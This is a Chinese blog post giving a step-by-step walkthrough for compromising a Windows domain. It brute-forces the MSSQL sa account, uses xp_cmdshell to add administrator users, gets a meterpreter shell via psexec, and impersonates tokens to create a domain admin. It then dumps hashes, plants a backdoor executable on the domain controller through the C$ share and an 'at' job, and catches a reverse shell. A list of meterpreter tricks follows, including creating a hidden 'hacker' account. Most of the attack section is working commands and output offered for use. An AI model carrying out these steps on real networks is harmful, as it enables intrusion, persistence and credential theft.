***客戶端PC通過SA權限,到內網域***系類

原創 0xsetup 2018-09-12 06:09

整體框架圖

wKiom1UDxHHwQFHOAAEFNonb3io857.jpg

wKioL1UDxafD2Ll9AACWNarE2vc043.jpg

利用msf

use  auxiliary/scanner/portscan/tcp

可以進行掃一些相關的端口。

發現1433端口以後,進行對mssql嘗試進行暴力破解

Mssql_login

破解完以後(這個破解也主要看字典)進行mssql自己的特性,xp_cmdshell進行命令操作

 Use Auxiliary/scanner/mssql/mssql_exec

 Set  rhost ip

 Set username sa

Set password 密碼

 Set cmd whoami  //這個是重點,在這裏進行命令

Exploit

wKioL1UDxcfy0FHTAAB6b0pkNUU357.jpg

如果是增加用戶

Set cmd net users kaifeng kaifeng /add

Exploit

一次命令就算執行完畢,下一次執行命令要重新cmd

Set cmd net localgroup administrators kaifeng /add

Exploit

***執行完畢

利用psexec

進行反彈連接,得到一個meterpreter

 

wKioL1UDxfCy_1oAAABaItV0cf4622.jpg

Run getgui -e

use  auxiliary/scanner/portscan/tcp

Exploit

wKiom1UDxQPBGVJUAABDrD5AJ3U489.jpg

證明3389就打開了

 

開始偷取令牌

Use incognito

List_tokens -u

Impersonate_token 上面列出的令牌

如果成功的話,就已經攻下另外一臺主機了。可以進入shell端口進行whoami進行查看

然後建立一個域管理員進行登錄,管理整個域

Net users kaifeng kaifeng /add /domain

Net localgroup administrators kaifeng /add /domain

然後利用

Psexec 進行登錄,用戶名和密碼都已經建立

登錄成功以後就可以進行查看整個域的管理

通過meterpreter查看整個域的hash值 dumphash

 

 

 

 

如果拿下了一臺域管理員以後,要想拿下其他的機子時,可以利用導出hash來拿其他的機子。或者是利用令牌導到別的機子,然後上傳一個***,在進入到shell,定好時間執行,在msf進行監聽,則可以拿到權限。

在域管理員的下面

meterpreter > upload /var/www/door.exe c:\

meterpreter > shell

C:\WINDOWS\system32>dir c:\

C:\WINDOWS\system32>複製到DIS9域管理機子

C:\>copy door.exe \\DIS9TEAM-DOMAIN\c$
copy door.exe \\DIS9TEAM-DOMAIN\c$

C:\>
獲得DIS9TEAM-DOMAIN的時間
C:\>net time \\DIS9TEAM-DOMAIN

C:\>
時間是05.02,添加一項作業 5.04運行***door.exe 然後MSF監聽
C:\at \\DIS9TEAM-DOMAIN 05:04 c:\door.exe
at \\DIS9TEAM-DOMAIN 05:04 c:\door.exe

C:\>exit
meterpreter > background
[*] Backgrounding session 2...
msf exploit(handler) > exploit
[*] Started reverse handler on 1.1.1.3:4444
[*] Starting the payload handler..

可以利用這個方法拿下其他機子

知識擴充

特色功能1:快速提權
Getsystem命令快速提權
實在沒有比這個簡單的了
一條指令你就擁有了System權限

Meterpreter會自己嘗試用多種方法讓你獲得System權限

特色功能2:Hashdump
運行這個命令:run post/windows/gather/hashdump
一條命令你就能夠獲得Windows的Sam 數據庫裏的內容
就是經過加密的用戶名和密碼

特色功能3:直接打開3389
Getgui命令是Meterpreter新添加的命令
這個命令能夠讓你輕鬆的在目標系統上打開3389遠程管理
這條命令有兩個用法:run getgui -e(僅僅是打開遠程管理)
run getgui -u hacker -p s3cr3t(打開遠程管理並且創造一個新的用戶名爲Hacker密碼爲s3cr3t的帳號)

特色功能4:網絡嗅探
Meterpreter擁有非常強大的網絡嗅探能力
它能夠不在目標系統上安裝任何驅動的情況下進行網絡嗅探
而且它還聰明到了自己的流量要被忽略掉

特色功能5:網絡中繼
往往***局域網***碰到的最大困難時無法穿過NAT
現在有了Meterpreter就輕鬆了
Meterpreter能夠讓一臺你已經***的電腦變成中繼,來***同一個局域網裏的其他電腦


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

內網***測試定位技術總結

Summer1Li 2018-11-28 13:44:58

內網(域)***之常見命令(續)

296991904 2018-09-12 06:10:08

內網***之常見命令

296991904 2018-09-12 06:10:07

內網***

ghostway 2018-09-12 03:16:30

kali linux內網嗅探

Snow狼 2018-09-11 09:33:53

MSSQL內網***筆記

then默然 2018-09-11 06:05:05

域***提權之MS14-068

z2pp 2019-02-22 23:21:39

Windows Credentials Editor v1.2 (WCE)在***過程中的關鍵作用

enables 2019-02-22 16:28:53

一些可用於研究的GIS數據資源

國內的情況就不用說了,基本上是很難找到可以用於研究的GIS數據資源的。要麼就是收費,免費的即使能找到,能否合法合規的進行使用也是一個問題。地理信息數據還是國外比較開放一些,相當多的政府組織或者公益機構對公衆開放了下載渠道,大家可以適度獲取並

harlee44 2024-05-07 14:31:18

如何在低代碼平臺中引用 JavaScript ?

引言 在當今快速發展的數字化時代,企業對業務應用的需求日益複雜且多元。低代碼開發平臺作爲一個創新的解決方案,以直觀易用的設計理念,打破了傳統的編程壁壘,讓非技術人員也能輕鬆構建功能完備的Web應用程序,無需深入編碼。這一特性極大地簡化了應用

葡萄城技術團隊 2024-05-07 14:30:48

如何使用 JavaScript 獲取當前頁面幀率 FPS

可以通過計算每秒 window.requestAnimationFrame 的調用頻率來做爲 FPS 值。它接收一個回調函數,該回調函數會在瀏覽器下一次重繪之前執行。所以只要我們循環調用並記錄單位時間內的調用次數就能計算當前頁面的幀率了。

劉漢貴 2024-05-07 14:26:58

Dash 2.17版本新特性介紹

本文示例代碼已上傳至我的Github倉庫https://github.com/CNFeffery/dash-master   大家好我是費老師,不久前Dash發佈了其2.17.0版本,執行下面的命令進行最新版本Dash的安裝: pip

費弗裏 2024-05-07 14:21:37

人大金倉數據庫使(cai)用(keng)記錄

最近一直在用人大金倉做項目,相關的文檔相比其它流行的所謂“主流”數據庫來說還是少了點,記錄一些開發過程中遇到的問題。 數據庫的模式(database_mode)在實例創建後就確定好了的,不可更改。想要改變模式只能重新init一個實例。

M_mxy 2024-05-07 14:17:06

《最新出爐》系列入門篇-Python+Playwright自動化測試-43-分頁測試

1.簡介 分頁測試,這種一般都是公共的方法系統中都寫好了,這種一般出現是數據展示比較多的時候,會採取分頁的方法,而且比較固定,一般是沒有問題的,因此它非常適合自動化測試,但是如何使用playwright來進行分頁自動化測試了,宏哥今天就講解

北京-宏哥 2024-05-07 14:14:46

Ubuntu18 安裝NoMachine遠程桌面(解決遠程桌面延遲)

# 問題:Ubuntu 18 使用自帶的共享桌面、VNC遠程桌面延遲、降低分辨率也無效。 # 方案:最後找到安裝 NoMachine的遠程桌面,解決遠程卡頓問題 根據自己操作系統 選擇NoMachine for Linux進行下載官網:ht

iucx 2024-05-07 14:11:26